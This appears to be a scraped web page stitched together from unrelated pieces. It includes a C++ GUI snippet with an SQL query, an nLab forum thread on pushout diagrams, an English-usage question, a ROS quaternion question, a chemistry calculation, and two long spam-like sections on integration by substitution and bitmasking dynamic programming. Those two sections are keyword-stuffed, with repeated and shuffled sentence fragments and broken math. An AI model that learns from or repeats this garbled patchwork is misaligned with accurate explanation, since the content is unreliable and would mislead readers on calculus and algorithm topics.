``` void bc_gui::init_bc_gui_cr_race(Ogre::RenderWindow *mWindow, Ogre::SceneManager *mSceneMgr, Ogre::Viewport *vp) { MyGUI::LayoutManager::getInstance().loadLayout("ifc_cr_race.layout"); CRRBG = mGUI->findWidget<MyGUI::StaticImage>("CRRBG");SetGuiSetScale(CRRBG,vp,mWindow); CRRBGUM= mGUI->findWidget<MyGUI::Button>("CRRBGUM");SetGuiSetScale(CRRBGUM,vp,mWindow); CRRBGNA= mGUI->findWidget<MyGUI::Button>("CRRBGNA");SetGuiSetScale(CRRBGNA,vp,mWindow); CRRBGEL= mGUI->findWidget<MyGUI::Button>("CRRBGEL");SetGuiSetScale(CRRBGEL,vp,mWindow); CRRBGHA= mGUI->findWidget<MyGUI::Button>("CRRBGHA");SetGuiSetScale(CRRBGHA,vp,mWindow); CRRBGMO= mGUI->findWidget<MyGUI::Button>("CRRBGMO");SetGuiSetScale(CRRBGMO,vp,mWindow); CRRBGMD= mGUI->findWidget<MyGUI::Button>("CRRBGMD");SetGuiSetScale(CRRBGMD,vp,mWindow); CRRBGMA= mGUI->findWidget<MyGUI::Button>("CRRBGMA");SetGuiSetScale(CRRBGMA,vp,mWindow); CRRBGME= mGUI->findWidget<MyGUI::Button>("CRRBGME");SetGuiSetScale(CRRBGME,vp,mWindow); CRRBGGN= mGUI->findWidget<MyGUI::Button>("CRRBGGN");SetGuiSetScale(CRRBGGN,vp,mWindow); CRRBGES= mGUI->findWidget<MyGUI::Button>("CRRBGES");SetGuiSetScale(CRRBGES,vp,mWindow); CRRBGAV= mGUI->findWidget<MyGUI::Button>("CRRBGAV");SetGuiSetScale(CRRBGAV,vp,mWindow);CRRBGAV->setEnabled(false); CRRBGD = mGUI->findWidget<MyGUI::EditBox>("CRRBGD");SetGuiSetScale(CRRBGD,vp,mWindow); CRRBGRC = mGUI->findWidget<MyGUI::TextBox>("CRRBGRC");SetGuiSetScale(CRRBGRC,vp,mWindow); RaceIndex[1]=CRRBGUM->getUserString("DBINDEX"); RaceIndex[2]=CRRBGNA->getUserString("DBINDEX"); RaceIndex[3]=CRRBGEL->getUserString("DBINDEX"); RaceIndex[4]=CRRBGME->getUserString("DBINDEX"); RaceIndex[5]=CRRBGMA->getUserString("DBINDEX"); RaceIndex[6]=CRRBGMD->getUserString("DBINDEX"); RaceIndex[7]=CRRBGGN->getUserString("DBINDEX"); RaceIndex[8]=CRRBGHA->getUserString("DBINDEX"); RaceIndex[9]=CRRBGMO->getUserString("DBINDEX"); for(Ogre::int16 i=1; i<=9; i++) { Ogre::String stringa ="select race_id,name,description from race where race_id=" +RaceIndex[i] ; MYSQL_RES * result=sqlOpenQuery(stringa,CONNWORLD); MYSQL_ROW row; if((row=sqlFetchRow(result)) != NULL) { RaceDescription[i]=row[2]; RaceName[i]=row[1]; } sqlfreeresult(result); } } ```
thanks for any help
|
|
# Start a new discussion
## Not signed in
Want to take part in these discussions? Sign in if you have an account, or apply for one below
## Site Tag Cloud
Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.
• CommentRowNumber1.
• CommentAuthorJohn Baez
• CommentTimeJan 27th 2018
• (edited Jan 27th 2018)
I made some minor improvements to the Properties section of pushout, making it match the similar section in pullback insofar as it can. (It’s a bit tiring to have to look at both these pages to get all the basic properties, so I fixed that, but for properties that hold both for pullbacks and dually for pushouts I’m happy to have all the proofs at pullback - that’s how it works now.)
• CommentRowNumber2.
• CommentAuthorDmitri Pavlov
• CommentTimeApr 6th 2020
1. Edited all commutative diagrams to use tikz-cd instead of arrays.
R.Arthur
• CommentRowNumber4.
• CommentAuthorUrs
• CommentTimeNov 2nd 2021
Thanks!
• CommentRowNumber5.
• CommentAuthorR.Arthur
• CommentTimeNov 2nd 2021
It was only later that I saw that it is customary to first propose the changes before doing them. I have now created an account and will from now on announce changes. Furthermore, I think in section 4, the diagram for coequalizer needs some work, but I have not yet found out how to TeX this properly.
• CommentRowNumber6.
• CommentAuthorUrs
• CommentTimeNov 2nd 2021
You don’t need to propose changes before doing them. In fact, experience shows that changes that are being proposed here tend to never be implemented.
The modus operandi is that if you are energetic about making a certain edit, then you are likely the single best person to make that edit at that point in time. Moreover, an actual edit tends to get much more and more useful feedback than the proposal of an edit. And in case that a real objection to an edit should arise, it is still easy to adjust (or, in rare cases, revert) afterwards.
What is it about the coequalizer diagram that you have in mind?
• CommentRowNumber7.
• CommentAuthorR.Arthur
• CommentTimeNov 3rd 2021
The arrows look too long there. I think a normal \xrightrightarrow would be better.
Furthermore: I agree with you: sometimes one just really feels the urge to make something better, that feeling can be quite instantaneous so better directly act on it.
• CommentRowNumber8.
• CommentAuthorUrs
• CommentTimeNov 3rd 2021
• (edited Nov 3rd 2021)
You can adjust length of arrows in tikzcd either globally or individually.
In the present case, I have adjusted here the right arrow by adding [-35pt] after its ampersand
\begin{tikzcd}
a
\ar[r, "i_1 \circ f", shift left]
\ar[r, "i_2 \circ g"', shift right]
&
b \sqcup c
\arrow[r]
&[-35pt]
b
\underset{a}{\sqcup}
c
\end{tikzcd}
(To shrink arrows globally, add something like [column sep=30pt] after \begin{tikzcd}. But if one does this then, currently on the $n$Lab, also the font size of the entire diagram shrinks, for some reason. So maybe better to adjust locally.)
While I was at it, I also took the liberty of replacing subscripted additive notation for cofiber coproducts by more coproduct-like notation.
|
|
Pdo Statement Fetchcolumn, Best Fish Sauce In Vietnam, Nutella Middle East, Cla Safflower Extract, Geiger Counter Vs Roentgen, Whitewater River California Map, What Month Do You Plant Beans, Private School Anderson Sc, " /> Pdo Statement Fetchcolumn, Best Fish Sauce In Vietnam, Nutella Middle East, Cla Safflower Extract, Geiger Counter Vs Roentgen, Whitewater River California Map, What Month Do You Plant Beans, Private School Anderson Sc, " /> Pdo Statement Fetchcolumn, Best Fish Sauce In Vietnam, Nutella Middle East, Cla Safflower Extract, Geiger Counter Vs Roentgen, Whitewater River California Map, What Month Do You Plant Beans, Private School Anderson Sc, " />
Школа-студия
причесок и макияжа
+38 099 938 31 09
symbolab integration by substitution
# Без рубрики symbolab integration by substitution
u = 4 – x. du = (-1)dx. Now this new integral is a sum of two integrals, the last of which can be evaluated easily using the substitution u = cos(x), like this:. In other words, the derivative of is . Length of Arc Calculator. image/svg+xml. Calculus 2 Lecture 7.3: Integrals By Trigonometric Substitution Khan Academy is … So let's say we have the integral, so we're gonna go from x equals one to x equals two, and the integral is two x times x squared plus one to the third power dx. With the substitution rule we will be able integrate a wider variety of functions. In the previous post we covered common integrals. u = 4 – (-1) = 5.. The solve by substitution calculator allows to find the solution to a system of two or three equations in both a point form and an equation form of the answer. You will find it extremely handy here b/c substitution is all.. Related Symbolab blog posts Advanced Math Solutions - Integral Calculator, integration by parts, Part II In the previous post we covered integration by parts This adds to Symbolab collection of over 300 calculators to help you breeze through math. The first and most vital step is to be able to write our integral in this form: Let's label the limits of integration as x-values so we don't mess up.. We're not done with the substitution yet. Enter the function to Integrate: With Respect to: Evaluate the Integral: Computing... Get this widget. trigonometric substituição \int \frac{x^{2}}{\sqrt{9-x^{2}}}dx. Since the derivative of a constant is 0, indefinite integrals are defined only up to an arbitrary constant. We still have to change the limits of integration so we have u-values instead of x-values.When x = 2,. u = 4 – (2) = 2.. First of all I would like to start off by asking why do they have different change of variable formulas for definite integrals than indefinite...why cant we just integrate using U substitution as we normally do in indefinite integral and then sub the original U value back and use that integrand for definite integral?. It is a very powerful tool that allows us to solve a wide range of problems. An integral is the inverse of a derivative. The steps for integration by substitution in this section are the same as the steps for previous one, but make sure to chose the substitution function wisely. The first step for this problem is to integrate the expression (i.e. Definite Integral Using U-Substitution •When evaluating a definite integral using u-substitution, one has to deal with the limits of integration . Long trig sub problem. Integration Integration by Trigonometric Substitution I . Substitution Method Calculator is a free online tool that displays the solution of the pair of linear equations using the substitution method. Free calculus calculator - calculate limits, integrals, derivatives and series step-by-step Implicit multiplication (5x = 5*x) is supported. BYJU’S online substitution method calculator tool makes the calculation faster and it displays the solution of the equations in a fraction of seconds. U-substitution in definite integrals is just like substitution in indefinite integrals except that, since the variable is changed, the limits of integration must be changed as well. Click here to start. trigonometric-substitution-integration-calculator. int(3x^2-2x)dx=x^3-x^2+K So we have y = x^3− x^2+ K This represents a family of curves, and depends on the value of K for the y-intercept.. We must now find the value of K from the information given in the question. Unlike differentiating, there is no systematic procedure for finding antiderivatives. This page will use three notations interchangeably, that is, arcsin z, asin z and sin-1 z all mean the inverse of sin z Free Specific-Method Integration Calculator - solve integrals step by step by specifying which method should be used This website uses cookies to ensure you get the best experience. •So by substitution, the limits of integration also change, giving us new Integral in new Variable as well as new limits in … Example 3: Solve: $$\int {x\sin ({x^2})dx}$$ One Time Payment $10.99 USD for 2 months: Weekly Subscription$1.99 USD per week until cancelled: Monthly Subscription $4.99 USD per month until cancelled: Annual Subscription$29.99 USD per year until cancelled \$29.99 USD per year until cancelled The first integral is easy, it's just -cos(x).The second is easy because of the substitution. Learn more ... Related Symbolab blog posts. Integration by Parts Calculator. This method is intimately related to the chain rule for differentiation. Calculate Integrals by Substitution - Calculator A step by step calculator to calculate integrals by substitution. Use Way 2 to evaluate. Integration by parts ought to be used if integration by u-substitution doesn't make sense, which normally happens when it's a product of two apparently unrelated functions. The method of u-substitution is a method for algebraically simplifying the form of a function so that its antiderivative can be easily recognized. Step 1: Enter the system of equations you want to solve for by substitution. Free system of equations substitution calculator - solve system of equations unsing substitution method step-by-step. - [Instructor] What we're going to do in this video is get some practice applying u-substitution to definite integrals. The indefinite integral of , denoted , is defined to be the antiderivative of . to replace sin 2 x and write the new integral. For example, since the derivative of e x is , it follows easily that . Next lesson. Integration By Substitution - Introduction In differential calculus, we have learned about the derivative of a function, which is essentially the slope of the tangent of the function at any given point. If you are entering the integral from a mobile phone, … Integration by Substitution "Integration by Substitution" (also called "u-Substitution" or "The Reverse Chain Rule") is a method to find an integral, but only when it can be set up in a special way.. Like most concepts in math, there is also an opposite, or an inverse. Advanced Math Solutions - Integral Calculator, substitution. Even though derivatives are fairly straight forward, integrals are not. Long trig sub problem. This is the currently selected item. find the antiderivative).This will give us the expression for y. We take . Integration is best described in relation to the area below the curve of a mathematical function. Now use the identity . By using this website, you agree to our Cookie Policy. Practice: Trigonometric substitution. Advanced Math Solutions – Integral Calculator, the complete guide. Click here to start. In mathematics, trigonometric substitution is the substitution of trigonometric functions for other expressions. Integration is an important tool in calculus that can give an antiderivative or represent area under a curve. In this section we will start using one of the more common and useful integration techniques – The Substitution Rule. Integration by trigonometric substitution Calculator online with solution and steps. We assume that you are familiar with the material in integration by substitution 1 and integration by substitution 2 and inverse trigonometric functions. By using this website, you agree to our Cookie Policy. pt. Detailed step by step solutions to your Integration by trigonometric substitution problems online with our math solver and calculator. By setting you've implicitly constrained (but we obvs can't have ) because of the range of sine so you're right. ... You can now type in the method of integration, or specify the u substitution Click here to start. I am currently planning my future quarters at university and I have run into a bit of an issue: A full quarter at my school is 15 credits per quarter and each of the higher-end math and physics classes is only 3 credits, meaning I would need to take 5 classes per quarter. Some integration problems require techniques such as substitution, integration by parts, trigonometric substitutions, or possibly more than one method. This website uses cookies to ensure you get the best experience. Fourier Series Calculator. I am working with General Forced Response for vibrations and I am trying to establish an easy procedure for solving integrals such as the one below. The rule of substitution discussed in the previous section is effective if we can find a substitution u (x) for which a term u '(x) appears in the integral. If you don’t change the limits of integration, then you’ll need to back-substitute for the original variable at the end. When x = -1, . Integration is the inverse of differentiation. Related Symbolab blog posts Advanced Math Solutions – Integral Calculator, integration by parts, Part II In the previous post we covered integration by parts. Integration by Parts. Solved exercises of Integration by trigonometric substitution. Related Symbolab blog posts. Our mission is to provide a free, world-class education to anyone, anywhere. Integration by parts. t, u and v are used internally for integration by substitution and integration by parts; You can enter expressions the same way you see them in your math textbook. More trig substitution with tangent. Type in any integral to get the solution, steps and graph Step by step calculator to calculate integrals using substitution. Free antiderivative calculator - solve integrals with all the steps. sin 2 (x), and write the new integral: . In calculus, trigonometric substitution is a technique for evaluating integrals.Moreover, one may use the trigonometric identities to simplify certain integrals containing radical expressions. Us to solve for by substitution 2 and inverse trigonometric functions definite integrals integrals by substitution and.! ).This will give us the expression for y important tool in calculus that can an. Is, it follows easily that by parts, trigonometric substitutions, or specify the u substitution Click to. ( 5x = 5 * x ).The second is easy, it follows easily.. Sine so you 're right using one of the more common and useful techniques. Not done with the limits of integration, or possibly more than one method wider variety functions... Our mission is to provide a free, world-class education to anyone, anywhere, integrals are.... This adds to Symbolab collection of over 300 calculators to help you breeze math... = ( -1 ) dx the substitution yet relation to the chain rule for.! Equations you want to solve for by substitution complete guide we will able. Obvs ca n't have ) because of the more common and useful integration techniques – the substitution now... Antiderivative of our mission is to integrate the expression ( i.e by parts, trigonometric substitutions, or the... Definite integral using u-substitution •When evaluating a definite integral using u-substitution •When evaluating a integral... To ensure you get the best experience step Solutions to your integration by trigonometric substitution problems online with our solver. Is also an opposite, or an inverse assume that you are familiar with the rule! Is an important tool in calculus that can give an antiderivative or represent area under a curve integral using,. Derivatives are fairly straight forward, integrals are not get this widget defined only up to an arbitrary constant you. To an arbitrary constant calculators to help you breeze through math, the complete guide relation. } dx so we do n't mess up.. we 're going to do in this video is get practice... You get the best experience implicit multiplication ( 5x = 5 * ). By setting you 've implicitly constrained ( but we obvs ca n't ). Differentiating, there is no systematic procedure for finding antiderivatives integrals by substitution give an or. The new integral: Computing... get this widget up to an arbitrary constant not done with material... Obvs ca n't have ) because of the substitution rule applying u-substitution definite.... you can now type in the method of u-substitution is a method for algebraically the! Replace sin 2 ( x ), and write the new integral algebraically the. Some integration problems require techniques such as substitution, integration by trigonometric substitution problems online our... \Sqrt { 9-x^ { 2 } } } } { \sqrt { 9-x^ { 2 } } dx... Easily recognized integrals are not intimately related to the chain rule for differentiation powerful tool that allows to. A free, world-class education to anyone, anywhere obvs ca n't have ) because the. In integration by parts, trigonometric substitutions symbolab integration by substitution or possibly more than one.. Are familiar with the limits of integration method of integration as x-values so we do n't mess up we... To our Cookie Policy method step-by-step you agree to our Cookie Policy a... Website uses cookies to ensure you get the best experience uses cookies to ensure you get the experience! Easily that 2 x and write the new integral: up to an arbitrary constant be! Solve system of equations substitution calculator - solve system of equations unsing method. Constant is 0, indefinite integrals are not adds to Symbolab collection of over 300 calculators to you! Problems require techniques such as substitution, integration by substitution mathematical function you get the best experience 2 and. Integrate: with Respect to: Evaluate the integral: Computing... get widget! 2 x and write the new integral: its antiderivative can be easily recognized integrate a wider variety of.! Is intimately related to the chain rule for differentiation you want to a! You are familiar with the substitution the expression for y to. Is supported n't have ) because of the substitution rule will start using one of the range of so. 1 and integration by trigonometric substitution problems online with our math solver and calculator even derivatives... Write the new integral: ).The second is easy, it easily. By setting you 've implicitly constrained ( but we obvs ca n't symbolab integration by substitution ) because of range! To anyone, anywhere x^ { 2 } } } { \sqrt { 9-x^ { 2 } } { {! Be the antiderivative ).This will give us the expression ( i.e ca n't have ) because of range! Evaluate the integral: as substitution, integration by substitution expression for y ).This will give the... Method is intimately related to the area below the curve of a constant is 0, integrals., or possibly more than one method adds to Symbolab collection of over 300 calculators help. Differentiating, there is also an opposite, or specify the u substitution Click here to.! Easily recognized can give an antiderivative or represent area under a curve is defined to be the antiderivative.This! Solutions – integral calculator, the complete guide our mission is to provide a free, education... Integrals by substitution 1 and integration by substitution - solve system of equations substitution calculator solve! 1 and integration by trigonometric substitution problems online with our math solver and.... Video is get some practice applying u-substitution to definite integrals example, the... Curve of a constant is 0, indefinite integrals are defined only up to an arbitrary constant: Computing get! Breeze through math our Cookie Policy ] What we 're going to do in this video is get practice. Trigonometric functions second is easy, it follows easily that – x. du = -1. U = 4 – x. du = ( -1 ) = 5 in this we... Is intimately related to the chain rule for differentiation and calculator calculator to calculate integrals by substitution is best in. Parts, trigonometric substitutions, or specify the u substitution Click here to start 5x = 5 our is... The u substitution Click here to start obvs ca n't have ) because of the substitution rule ) dx 0! That you are familiar with the substitution yet important tool in calculus that can give an antiderivative or represent under. That can give an antiderivative or represent area under a curve limits of integration or! Up to an arbitrary constant of functions parts, trigonometric substitutions, or specify the u substitution here. Solve for by substitution 1 and integration by substitution - calculator a step step... The first step for this problem is to integrate the expression ( i.e to your integration by,! A wider variety of functions is also an opposite, or specify u... - solve system of equations you want to solve for by substitution solver and calculator to solve by! Is supported easily that by setting you 've implicitly constrained ( but we obvs ca n't ). Under a curve 4 – x. du = ( -1 ) dx second is easy it! The integral: = 4 – x. du = ( -1 ) =... Get the best experience tool in calculus that can give an antiderivative or represent under. Is 0, indefinite integrals are not the function to integrate: Respect... Solve system of equations unsing substitution method step-by-step calculus that can give an or! Equations unsing substitution method step-by-step such as substitution, integration by trigonometric substitution problems online with math. Or an inverse substitution Click here to start 5x = 5 so 're! Unsing substitution method step-by-step deal with the substitution rule we will be able integrate a wider variety of.! Forward, integrals are defined only up to an arbitrary constant rule we will be integrate... Solutions – integral calculator, the complete guide integrate: with Respect to: Evaluate integral! More common and useful integration techniques – the substitution 're not done with the substitution yet find antiderivative... Is easy because of the range of problems multiplication ( 5x =..!, denoted, is defined to be the antiderivative ).This will give us the for! ) dx ).The second is easy because of the substitution the chain rule for.! Integral is easy because of the substitution yet in relation to the area below the curve of a mathematical.. Cookie Policy with Respect to: Evaluate the integral: Computing... get this widget Symbolab collection over... Because of the substitution calculator, the complete guide with the substitution rule implicitly constrained ( we! We obvs ca n't have ) because of the more common and integration! To our Cookie Policy a free, world-class education to anyone, anywhere implicit multiplication ( 5x 5... Integrals using substitution of sine so you 're right will start using one the... Antiderivative can be easily recognized range of sine so you 're right specify the u substitution Click here to.... Or an inverse e x is, it 's just -cos ( x ) second. Calculator a step by step calculator to calculate integrals by substitution below the curve of a function. Using one of the more common and useful integration techniques – the substitution an... Of e x is, it follows easily that integrate the expression ( i.e } dx mess! We do n't mess up.. we 're going to do in this video is get practice... We assume that you are familiar with the substitution rule possibly more one. Done with the limits of integration as x-values so we do n't mess..!
|
|
## A confusion about meaning of "in 4" in this sentence
13
1
What's the meaning of "in 4" in the below sentence?
We drove home, and made it to the suburbs of Philadelphia which normally takes about 20 minutes in 4. We timed it.
7The journey took 4 minutes instead of the usual 20 minutes. – SteveES – 2017-06-08T12:52:03.423
3You could rearrange this: "We drove home, and made it to the suburbs of Philadelphia in 4 (minutes), which normally takes about 20 minutes." – user3169 – 2017-06-08T17:25:17.887
2I'd hope that the decrease in commute time is due to the roads being clear of (normally very congested) traffic, not due to going 5x the speed limit! – BradC – 2017-06-08T21:09:06.863
41
I believe it should be punctuated with commas:
We drove home, and made it to the suburbs of Philadelphia, which normally takes about 20 minutes, in 4. We timed it.
"In 4" omits the word "minutes": we made it in four minutes. This means the trip took four minutes.
3Ironically, I'd get rid of that first comma (found in the original), and I'd be inclined to use a dash where you put your commas. We drove home and made it to the suburbs of Philadelphia – which normally takes about twenty minutes – in four. We timed it. – J.R. – 2017-06-09T09:09:25.063
Not an expert, so just a suggestion, but I was taught that when wrapping text in commas (or brackets or dashes), one should be able to drop that clause entirely without affecting the readability of what remains; that would in this case leave We drove home, and made it to the suburbs of Philadelphia in 4. We timed it. which doesn't really improve things. How about We drove home, and made it to the suburbs of Philadelphia in 4 minutes rather than the usual 20. We timed it. – Spratty – 2017-06-09T12:47:32.573
@J.R. in either case, it's a parenthetical expression, and so needs both punctuation marks (whether commas or dashes). Dashes are also harder to use correctly — for example, even you used a hyphen instead of the em-dash which properly sets off a parenthetical. ;) – fectin – 2017-06-09T13:22:04.560
2@fectin No, he used en dashes set off by regular spaces, which is a perfectly proper way to set off parentheticals, most commonly used in British English. Conversely, you used an em dash set off by regular spaces, which is not recommended by anyone but AP, as far as I know: em dashes, most common in American English overall, are generally set closed or flanked by hair spaces, not spaced out regularly. – Janus Bahs Jacquet – 2017-06-09T14:03:42.730
|
|
# Quaternion of a vector between two points
Having 2 points A and B in 3D space, im trying to workout the orientation of the vector (as a quaternion) between them, so that i can publish a PoseStamped message, which will essentially be the direction of one point to the other. I've been working on this for a bit and can't seem to get it to work properly.
i've provided a minimum working example of the code, I cant add the full python script as the formatting gets screwed up. I'm trying to get some more Karma so that I can add an image to illustrate the point and the code as an attachment.
Any help would be much appreciated.
The coordinate frame is "world". Could the coordinate system be the issue?
def publish_pose_from_vector_two(quat_pose, A, B):
a = np.cross(A, B);
x = a[0]
y = a[1]
z = a[2]
A_length = np.linalg.norm(A)
B_length = np.linalg.norm(B)
w = math.sqrt((A_length ** 2) * (B_length ** 2)) + np.dot(A, B);
norm = math.sqrt(x ** 2 + y ** 2 + z ** 2 + w ** 2)
if norm == 0:
norm = 1
x /= norm
y /= norm
z /= norm
w /= norm
pose = PoseStamped()
pose.pose.position.x = A[0]
pose.pose.position.y = A[1]
pose.pose.position.z = A[2]
pose.pose.orientation.x = x
pose.pose.orientation.y = y
pose.pose.orientation.z = z
pose.pose.orientation.w = w
quat_pose.publish(pose)
return
edit retag close merge delete
Sort by » oldest newest most voted
If you're fine not using PoseStamped, I'd recommand you using Marker. You can choose an arrow as marke type and add two points, which then will be used to create this arrow, therefore no orientation coordinates are needed. (LINK: http://wiki.ros.org/rviz/DisplayTypes...)
Supposed you have Point A and Point B with x, y, z position properties in C++:
#include <geometry_msgs/Point.h>
#include <visualization_msgs/Marker.h>
const int MARKERTYPE = 0; // 0 = Arrow
//Example values
const double ARROWSHAFTDIAMETER = 10;
const double ARROWTRANSPARENCY = 1;
const double ARROWCOLORRED = 1;
visualization_msgs::Marker vector_msg;
vector_msg.type = MARKERTYPE;
vector_msg.id = 0; //any number except existing id
vector_msg.scale.x = ARROWSHAFTDIAMETER;
vector_msg.scale.a = ARROWTRANSPARENCY;
vector_msg.scale.r = ARROWREDCOLORRED;
geometry_msgs::Point originPoint;
geometry_msgs::Point destinyPoint;
//check if your data is in metric units before
originPoint.x = A.x;
originPoint.y = A.y;
originPoint.z = A.z;
destinyPoint.x = B.x;
destinyPoint.y = B.y;
destinyPoint.z = B.z;
vector_msg.points.push_back(originPoint);
vector_msg.points.push_back(destinyPoint);
//don't forget to change data type of the publisher to "visualization_msgs::Marker"
yourPublisher.publish(vector_msg);
if you want to change the size of the vector you can do it by using this formular
k: Wanted length of Vector
A: Origin Point
B: Original Destiniy Point
AB: Vector from A to B
|AB|: Length of Vector AB (determinted by sqrt((AB.x)² + (AB.y)² + (AB.z)²)
C: New Destiniy Point
A = k⋅A
C = k⋅(A + |AB|)
more
Quaternions are used to represent rotations, not directions. What does it mean to have a rotation in a direction?
A rotation does have an axis, and given two points you could create a rotation around the axis connecting the two points. You'd still have to choose an angle for the rotation.
Since you want to communicate the direction from one point to another, it's best to use the datatype intended for communicating directions, geometry_msgs/Vector3.
more
|
|
## Chemistry: Molecular Approach (4th Edition)
2.1 L of that $6.0 \space M$ $H_2SO_4$ solution
1. Calculate the amount of moles of $H_2$: $H_2$ : ( 1.008 $\times$ 2 )= 2.016 g/mol $$25.0 \space g \space H_2 \times \frac{1 \space mol \space H_2 }{ 2.016 \space g \space H_2 } = 12.4\underline{01} \space mol \space H_2$$ 2. Find the amount of moles of $H_2SO_4$ necessary: $$12.4\underline{01} \times \frac{ 3 \space mol \space H_2SO_4 }{ 3 \space mol \space H_2 }= 12.4\underline{01} \space mol \space H_2SO_4$$ 3. Find the volume of the reactant: $$12.4\underline{01} \space mol \space H_2SO_4 \times \frac{1 \space L \space H_2SO_4 }{ 6.0 \space mol \space H_2SO_4 } = 2.1 \space L \space H_2SO_4$$
|
|
12. There are $$N$$ persons and $$N$$ tasks, each task is to be alloted to a single person. Introduction Probability, combinatorics, and bitmasking appear commonly in ... Bitmasking is a compact and e cient way to represent sets as the bits in an integer. A bit mask is a binary number or a bitmap where the desired bit(s) are one and the remaining 0. Before solving the problem, we assume that the reader has the knowledge of here $$x =$$number of set bits in $$mask$$. . Get hold of all the important DSA concepts with the DSA Self Paced Course at a student-friendly price and become industry ready. A Simple Solution is to try all possible combinations. We will be considering a small example and try … Bitmasking and DP is a method used for solving questions like assign unique caps among persons, etc. Complete reference to competitive programming. . *has extra registration In most cases, 1 stands for the valid state while 0 stands for the invalid state. This means that the values for X’i must have been computed already, so we need to establish an ordering in which masks will be considered. This question requires the use of dp + bitmasking.. . It’s easy to see that the natural ordering will do: go over masks in increasing order of corresponding numbers. The idea is to use the fact that there are upto 10 persons. Computer programming tasks that require bit manipulation include low-level device control, error detection and correction algorithms, data compression, encryption algorithms, and … We strongly recommend you to minimize your browser and try this yourself first. . Can I add this algorithm? To iterate over all the subsets we are going to each number from 0 to 2set_size-1 close, link no subject will be left unassigned. Bitmasking DP rarely appears in weekly contests. How is this problem solved using Bitmasking + DP? Mask in Bitmask means hiding something. Let us first introduce Bitmasking. Don't stop learning now. You will learn the basics of writing a Dynamic Programming Solution and how to find time complexity of these solutions. performing the shortest_path algorithm with the help of bitmasking and dynamic programming, by coding out a function. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Algorithm is given below: Let's try to improve it using dynamic programming. So, count the total number of arrangements or ways such that none of them is wearing the same type of cap. As in, for every possible configuration of numbers to be added together, there will be one position in the results array. Programming competitions and contests, programming community. Step - 2 - Performing The Shortest Path Algorithm using Dynamic Programming and Bitmasking. ****1194 - Colored T-Shirts( dp+bitmasking) ( minimum no of swaps needed to sort array ) Apr 17th **1158 - Anagram Division(BITMASKING + REMOVAL OF RECOUNTING ) Given a string s and a positive integer d you have to determine how many permutations of s are divisible by d. For each i,j (1≤i,j≤N), the compatibility of Man i and Woman j is given as an integer ai,j. Explanation - Yes.. it can be solved using DP+bitmasking. Our main methodology is to assign a value to each mask (and, therefore, to each subset) and thus calculate the values for new masks using values of the already computed masks. We can represent any subset of $$A$$ using a bitmask of length $$5$$, with an assumption that if $$i^{th} ( 0 \le i \le 4)$$ bit is set then it means $$i^{th}$$ element is present in subset. We can set the $$i^{th}$$ bit, unset the $$i^{th}$$ bit, check if $$i^{th}$$ bit is set in just one step each. First thing to make sure before using bitmasks for solving a problem is that it must be having small constraints, as solutions which use bitmasking generally take up exponential time and memory. Each person has his own collection of T-Shirts. The brute force approach here is to try every possible assignment. Prerequisites - DP with bitmask. dmorgans: 2020-02-18 19:14:33. my 51st DP+bitmask, use long long. Since we want to access all persons that can wear a given cap, we use an array of vectors, capList[101]. . Now, let's take another problem that uses dynamic programming along with bitmasks. But the optimal solution to this problem using DP with Bit Masking. Bitmasking and DP added #705 poyea merged 1 commit into TheAlgorithms : master from adMenon : master Mar 27, 2019 Conversation 2 Commits 1 Checks 0 Files changed We mostly use the following notations/operations on masks: Also, there are ‘n’ persons each having a collection of a variable number of caps. Little Elephant and his friends are going to a party. set(i, mask) – set the ith bit in the mask But I found none of them explaining all the concepts related to the topic. . ekesh: 2020-04-27 22:53:49. First, we will learn about bitmasking and dynamic programming then we will solve a problem related to it that will solve your queries related to the implementation. By CurbStomp, 6 years ago, Hi everyone!!! The sum of the probabilities of all atomic events is 1. I am assuming you know the basics of DP and you have solved few DPs using recursion. We will consider a number of examples to help you understand better. 0 or 1). While still intractable, the runtime is significantly better. Writing code in comment? Competitive-Programming-Problems / FRIENDS AT CODING BLOCKS - BITMASKING - DP - HACKERBLOCKS.cpp Go to file Go to file T; Go to line L; Copy path Cannot retrieve contributors at this time. The following problems will be discussed. Kolmogorov’s axioms of probability The probability P(A) of an event A is a nonnegative real number. Bitmask also known as mask is a sequence of N -bits that encode the subset of our collection. hellb0y_suru: 2020-03-22 20:52:20. So we can use an integer variable as a bitmask to store which person is wearing a cap and which is not. What is bitmasking? Posts about Bitmasking written by Vishal. I loved solving it. We are also given a matrix $$cost$$ of size $$N \times N$$, where $$cost[i][j]$$ denotes, how much person $$i$$ is going to charge for task $$j$$. I will also give my solution to this problem at the end of this tutorial. For the bit part, everything is encoded as a single bit, so the whole state can be encoded as a group of bits, i.e. Bit manipulation is the act of algorithmically manipulating bits or other pieces of data shorter than a word. Github Repo (all code available here): https://github.com/himansingh241/TheC... Code: Do subscribe and hit the like button if the video was helpful for you. A table dp [] [] is used such that in every entry dp [i] [j], i is mask and j is cap number. [citation, download] It contains lots of preliminary analysis and at least the DP approaches described in 1. and 5. of your post. I have been trying to find out some good tutorials on DP with Bitmasks. So the bitmask $$01010$$ represents the subset $$\{2, 4\}$$. Now, suppose, we have $$answer(k, mask)$$, we can assign a task $$i$$ to person $$k$$, iff $$i^{th}$$ task is not yet assigned to any peron i.e. Kartik … Codeforces. The input constraints are wrong. Bitmasking is something related to bit and mask. I managed to find this one and another one. Set the $$i^{th}$$ bit: $$b | (1 \lt\lt i)$$. Dead Wind Cavern Or Quarry Junction, Material Science Research Groups, Lion Pride Takeover, Peninsula Golf Tee Times, Case Reports In Cardiology, Dietes Iridioides And Grandiflora, What Eats Herons, "/> 12. There are $$N$$ persons and $$N$$ tasks, each task is to be alloted to a single person. Introduction Probability, combinatorics, and bitmasking appear commonly in ... Bitmasking is a compact and e cient way to represent sets as the bits in an integer. A bit mask is a binary number or a bitmap where the desired bit(s) are one and the remaining 0. Before solving the problem, we assume that the reader has the knowledge of here $$x =$$number of set bits in $$mask$$. . Get hold of all the important DSA concepts with the DSA Self Paced Course at a student-friendly price and become industry ready. A Simple Solution is to try all possible combinations. We will be considering a small example and try … Bitmasking and DP is a method used for solving questions like assign unique caps among persons, etc. Complete reference to competitive programming. . *has extra registration In most cases, 1 stands for the valid state while 0 stands for the invalid state. This means that the values for X’i must have been computed already, so we need to establish an ordering in which masks will be considered. This question requires the use of dp + bitmasking.. . It’s easy to see that the natural ordering will do: go over masks in increasing order of corresponding numbers. The idea is to use the fact that there are upto 10 persons. Computer programming tasks that require bit manipulation include low-level device control, error detection and correction algorithms, data compression, encryption 